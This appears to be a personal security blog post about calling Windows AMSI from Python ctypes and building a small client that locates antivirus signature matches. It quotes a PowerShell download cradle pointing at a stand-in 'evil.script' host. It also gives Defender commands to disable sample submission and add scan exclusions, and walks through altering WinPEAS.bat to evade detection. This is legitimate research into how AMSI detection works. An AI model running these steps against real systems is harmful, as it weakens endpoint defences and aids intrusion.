Introduction

This post discusses and documents some my personal experiments with the python ctypes library and how to use it to interact with Window’s Anti-Malware Scanning Interface (AMSI) in an attempt to learn a bit more about both. Later I will also discuss a small python script I created for myself which acts as an AMSI-client to reverse AV-signatures as well as some open questions I still have / future work.

This little adventure started for me after having seen Joff Thyer’s excellent and very recommendable three-part series on using Python ctypes for shellcode execution (see below).

AMSI

My first step was to try to find out a bit more about AMSI, how it works and what problems it tries to solve.

AMSI was mainly created to fight fileless, dynamically generated script-based attacks that make use of obfuscation techniques and payload encryption. In these type of attacks scripts never touch disk, which means that they cannot be monitored / analyzed using traditional filesystem minifilter drivers. The classic example of this attack would be a Powershell download cradle like the following, where an inner webrequest downloads/stores a script into memory and the outer command executes that content:

Invoke-Expression (Invoke-Webrequest https://evil.script/file.ps)

The idea behind AMSI is that the Windows platform itself provides a vendor-agnostic interface for any program, but in particular scripting engines, to submit content which can get consumed by any AV-vendor for scanning before execution. AV-engines then provide a verdict back to the originating program which can decide to halt execution of the content based on that verdict. In addition to these preventative measures, this process of submitting content to security providers creates visibility into what scripting runtimes are actually trying to execute. Scripting engines will pre-process provided scripts before it will be able to understand what actually needs to be executed. This means that obfuscated/encrypted content will be decrypted/de-obfuscated before submission to AMSI, making evasion techniques (theoretically) less effective. Since the PowerShell engine is open-source you can actually take a look at how this AMSI-call is executed here. Another interesting read would be the PEP-0551 standard for the Python runtime, which also discusses this topic in more depth.

By default AMSI is enabled on all modern Windows systems not just for PowerShell but for all common scripting engines like Windows Scripting Host, VBA Macros and JavaScript. Since the AMSI interface can take in generic data submissions from any program that implements an AMSI-client, AV-engines can also use this same interface to analyze things like HTTP requests as well as to look for suspicious URLs / IP addresses.

To summarize: most runtimes for dynamic languages will submit code for analysis through AMSI before execution, which in general means that:

AMSI.dll is loaded by the scripting engine.
Script text is provided to the AMSIscanbuffer function.
Malware protection services consume this buffer, analyze the provided data and return a verdict.
Runtime blocks execution of malicious content.

In the described scenario the scripting engine would be the so-called “AMSI-client” and the AV-vendor the “AMSI-provider”. Execute the below commands to see which AMSI providers are registered on your device ¹:

# See registered AMSI providers
gci 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'

# Select the AMSI providers and see registration based on CLSID
$AMSI = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -Recurse
$AMSI -match '[0-9A-Fa-f\-]{36}'
$Matches.Values | ForEach-Object {Get-ChildItem "HKLM:\SOFTWARE\Classes\CLSID\{$_}" | Format-Table -AutoSize}

Ctypes

Trying to interact with AMSI in a programmatic way using python required me to learn a bit more about the ctypes library. Ctypes is a python library that provides C-compatible data types for type safety and an easy way to interact with DLLs in pure Python. This is needed because Python built-in datatypes don’t one-to-one match up with standard C data-types and calling C-functions with incorrect datatypes tends to end badly ^_^

The following code shows the required steps to setup a function call using the AmsiIntialize function as an example, which is used to initialize the AMSI API. This includes the following steps:

Importing needed datatypes used in the function signature that you’d like to target.
Initializing your function pointer.
Preparing argument / return types.
Make the function call.
Check the returned value.

# Function signature of the AmsiInitialize function
'''
HRESULT AmsiInitialize(
    [in]  LPCWSTR      appName,
    [out] HAMSICONTEXT *amsiContext
);
'''
# 1. Importing windll and needed datatype definitions from ctypes
from ctypes import windll, POINTER, HRESULT, byref
from ctypes.wintypes import LPCWSTR, HANDLE
from comtypes.hresult import S_OK

# 2. Get the WINDLL Class for AMSI and grab the initialization function pointer.
AmsiInitialize = windll.amsi.AmsiInitialize

# 3. Set the expected argtypes / return types for type safety.
AmsiInitialize.argtypes = [LPCWSTR, POINTER(HANDLE)] 
AmsiInitialize.restype  = HRESULT

# 4. Initialize a required empty handle object and initialize the context
amsi_ctx  = HANDLE(None)
amsi_hres = AmsiInitialize("test3r", byref(amsi_ctx))

# 5. Check return value
if amsi_hres != S_OK:
    print(f"AMSI Context Initialization Failed: {amsi_hres}")
    sys.exit()

When writing such code you need to start converting Microsoft documented function signatures to Python native or ctypes datatypes. The following are some great resources to help with these C / Python / ctypes datatype conversions:

Something I have not tried to use, but which is interesting to look into is the ctypesgen project. As you can see from the above code snippet there’s a lot of boilerplate code needed before even a simple function can be called. Creating this manually for all needed functions can be tedious, and seems impossible if you are developing new production code where changes to these interfaces can be introduced, requiring more manual work to correct the function signatures. Ctypesgen aims to generate all the boilerplate for you. One of its main developers gave a great presentation about this project, as well as a good background lecture on ctypes in general and can be seen here.

AMSI Checker (Preparation)

After reading up on both previous concepts, my next step was to connect the dots and write the required boilerplate code + some wrapper class and then start submitting known-bad scripts to the AMSI API to see if this would work. However by default EDR solutions tend to eat-up these files when they touch disk as well as submit samples back to whatever vendor is in place so in preparation you need to somewhat incapacitate these solutions. This means you need to prevent it from submitting your adjusted content to their backend services as well as providing some whitelisted directory where any binaries / scripts might be living. See below some powershell snippets on how to do this when the main AV-engine / AMSI-provider is Windows Defender.

# Check current FileSubmission settings 
# (0 - on with prompt, 1 - automatic safe sample submission, 2 off, 3 automatic all submission)
$previousFileSubmissionSetting = (Get-MpPreference).SubmitSamplesConsent

# Disable FileSubmission
Set-MpPreference -SubmitSamplesConsent 2

# After testing reset to previous setting
Set-MpPreference -SubmitSamplesConsent $previousFileSubmissionSetting

# Disable active scanning of a trusted path
Add-MpPreference -ExclusionPath C:\Some\Path\To\You\Whitelist\Directory\

AMSI Checker

I wrote a Python class to instantiate the AMSI API, AMSI Context and AMSI Session after which the script would submit input files to AMSI over this session, try to zoom in onto the signature matches and report back the findings.

As an example I used the bat-version of the well-known privilege escalation project WinPEAS to perform some scanning to see if I could find out where the signature of the script lives and patch it. The following images show this process:

Downloading the script from GitHub and executing it fails.
Breaking the code up in chunks and submitting them to AMSI helps identify where the signature matches.
Manual code removal / adjustment to break the signature.
Rerunning the code sweep and seeing that AMSI is returning a healthy result.

1. WinPEAS.bat execution failure due to signature match.

2. Signature detection sweep using AMSI / python matches a single large section within the code.

3. Selective removal of code identifies two lines where the signature can be broken.

4. Success! No more detection and the script is allowed to run :)

Conclusion / Future Work / Other Notes

This experimentation deepened my understanding of how Windows deals with fileless threats as well as using the ctypes library to script interactions with AMSI. Some things I ams still unclear about related to this topic include:

Some EDR vendors supposedly create their own AMSI implementation, making bypasses / AMSI patching harder (or at least vendor-specific), but I’ve not been able to verify that.
I’d like to try out some API monitoring tools to see if there’s a difference between my AMSI submission and Powershell/Python scripting engine submissions. These engines might change the formatting / content before submission, therefore possibly hitting different signatures.

Some next things I’d still like to try out or follow up on:

Implementing an AMSI Provider in addition to the current Client. Some interesting resources for this would be: Blackberry - How to Implement An AMSI Provider, Microsoft - iantimalwareprovider-sample, Github - netbiosX/AMSI-Provider
Compare my script with the ThreatCheck / DefenderCheck success rate where the Defender engine is loaded / called instead of indirectly going through AMSI. I tried implementing a similar binary-search-like approach as those tools implement and started missing signatures.
Investigate unloading / patching AMSI and look into other well known AMSI bypass and exploitation approaches (e.g. create fake providers for persistence ² ³) as well as how to automate these.

“AMSI Bypass in one tweet” - by Matt Graeber

One thing I was not aware of before is to look at the Defender threat detection information when scripts/executables still match to see where they are matched (on disk vs. in memory):

# Check last detection which indicates the origin of the detection / threat description
Get-MpThreatDetection | sort InitialDetectionTime -Descending | select -First 1

Blog

Ctypes Exploration Through AMSI